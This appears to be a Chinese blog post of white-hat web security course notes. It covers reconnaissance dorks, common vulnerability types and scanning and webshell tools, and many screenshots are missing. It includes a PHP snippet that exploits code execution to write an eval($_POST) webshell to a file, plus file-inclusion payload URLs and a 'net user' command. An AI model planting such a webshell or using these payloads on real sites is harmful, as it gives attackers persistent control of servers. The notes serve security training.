WEB安全白帽(一) 米斯特

一,信息侦探技术准备工作

站长之家
搜索引擎
stie:baidu.com
inurl:baidu.com
站内侦探
//discuz论坛 https://www.***.org/space-uid-1.html
//dz 邮件找出源ip
社工库,大数据筛选
nmap.bat
nmap www.***.com -p 80
御剑
Malte go

厂商寻找

http://butian.360.cn/company/openindex
系统 后台类- **系统,平台, 管理
企业 类 - **公司,**企业,**平台

漏洞提交(白帽提交漏洞须知)

提交条件
演示
提交技巧

加密解密

md5 base64 url编码

理论

webshell exp poc 提权 渗透 远程控制 服务器
root administrator(s)
基本漏洞类型
弱口令 ***.php?info=1234
爆破 遍历
sql注入 get post cookie
xss攻击 xss.hi-ourlife.com xss平台
代码执行 命令执行 net user
文件包含 .php?include=index.php
越权
逻辑
配置错误
敏感信息泄露 site:www.
*.com intext:订单

二部分 漏洞

弱口令 爆破 遍历 .
java环境安装
java一键配置
brup工具
mysql手工注入语句大全
在这里插入图片描述

XSS
反射 -没有过滤
存储 -
DOM
在这里插入图片描述

csrf原理
OWASP-CSRFTester-1.0 半自动化工具伪造工具
文件包含
本地包含 ***.com/fileiniclude.php?file=file
远程包含 ***.com/fileiniclude.php?file=http-file
挖掘 e.g www.***.com/***.php?file=
在这里插入图片描述
在这里插入图片描述
远程包含
在这里插入图片描述

代码执行:
实例地址:
http://localhost/subject/code-exe.php?code=code

    熟知可利用常见的php函数:
    phpinfo()、echo等等调试函数
    使用代码执行漏洞创建个webshell:
    <?php
    $file='mst.php';$person='<?php @eval($_POST[1]);?>';file_put_contents($file, $person, FILE_APPEND | LOCK_EX);	    

在这里插入图片描述
在这里插入图片描述
越权
在这里插入图片描述
在这里插入图片描述
文件上传-brup工具修改数据上传
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
三-工具

safe3wvs工具
在这里插入图片描述
在这里插入图片描述
AWVS工具
Nmap工具
在这里插入图片描述
在这里插入图片描述
中国菜刀

椰树、御剑(6款扫描工具

bugscan
BruteXSS python2.7环境
在这里插入图片描述
在这里插入图片描述
GourdScan

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值